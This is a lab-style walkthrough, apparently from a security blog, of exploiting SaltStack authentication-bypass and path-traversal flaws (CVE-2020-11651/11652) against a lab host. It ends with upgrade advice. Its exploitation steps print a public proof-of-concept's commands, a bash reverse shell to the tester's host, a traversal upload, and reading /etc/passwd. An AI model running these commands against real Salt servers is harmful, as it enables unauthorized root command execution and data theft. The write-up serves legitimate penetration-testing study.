The Salt system is a Python-based, open-source remote execution framework for configuration management, automation, provisioning, and orchestration.
Running commands on remote systems is the core function of Salt. Salt can execute multiple commands across thousands of systems in seconds with a single execution.
https://docs.saltproject.io/salt/user-guide/en/latest/topics/overview.html
https://docs.saltproject.io/en/latest/topics/about_salt_project.html#about-salt
CVE-2020-11651
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
CVE-2020-11652
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
Affected Products
- SaltStack Salt 2019.2.3
- SaltStack Salt 3000.1
- Cisco Modeling Labs Corporate Edition (CML)
- Cisco TelePresence IX5000 Series
- Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE)
Enumeration
1. This vulnerability is present before the version 3000.1. We will enumerate this service, first I noticed an API site exposed
- http://192.168.71.62:8000/
2. In order to examine the version I ran I curl command and sent a HTTP request, to check upon the response header. I noticed “X-Upstream: salt-api/3000-1”
- curl -v http://192.168.71.62:8000/
Exploitation
1. Knowing this API is SaltStack we can proceed to look for exploits, I found this one that worked really well
2. We will proceed to download the exploit, and install the required libraries (salt)
- git clone https://github.com/jasperla/CVE-2020-11651-poc.git
- sudo pip3 install salt
- cd CVE-2020-11651-poc
- ls
3. now we proceed to execute the exploit.py file, we will execute the help toption
- python3 exploit.py -h
4. Now we will proceed, to execute the program as a test. If we get the “root key” it means it is working without issues
- python3 exploit.py –master 192.168.71.62
5. Now I will run a test command, I’ll run a ping command and capture it with TCPDump (this will only execute in the master, if you need to execute into all the minion server use –exec-all)
Packet Capture
- sudo tcpdump -i tun0
Command execution
- python3 exploit.py –master 192.168.71.62 –exec “ping -c 4 192.168.49.71”
Output in packet capture
6. At this point we know that we can execute commands and we have connectivity back to our local machine. Now I will start a listener, and, execute a bash reverse shell
Listener
- nc -lvp 4505
Reverse Shell
- python3 exploit.py –master 192.168.71.62 –exec “bash -i >& /dev/tcp/192.168.49.71/4505 0>&1”
Final result, (reverse shell)
- whoami && date && hostname
Optional
1. We can upload files, and, read them to verify
- echo “Vry4n was here” > sample.txt
- python3 exploit.py –master 192.168.71.62 –upload-src sample.txt –upload-dest ../../../../../../../../tmp/sample.txt
- python3 exploit.py –master 192.168.71.62 -r “/tmp/sample.txt”
2. We can also read files using (-r)
- python3 exploit.py –master 192.168.71.62 -r “/etc/passwd”
Remedy
Upgrade to the latest version of Salt (2019.2.4, 3000.2 or later), available from the SALTSTACK Web site.
Resources
https://exchange.xforce.ibmcloud.com/vulnerabilities/181316
https://exchange.xforce.ibmcloud.com/vulnerabilities/181317
https://github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst
https://www.exploit-db.com/exploits/48421
https://docs.saltproject.io/en/latest/topics/releases/2019.2.4.html
https://packetstormsecurity.com/files/157560
https://github.com/dozernz/cve-2020-11651
https://github.com/jasperla/CVE-2020-11651-poc
https://github.com/rossengeorgiev/salt-security-backports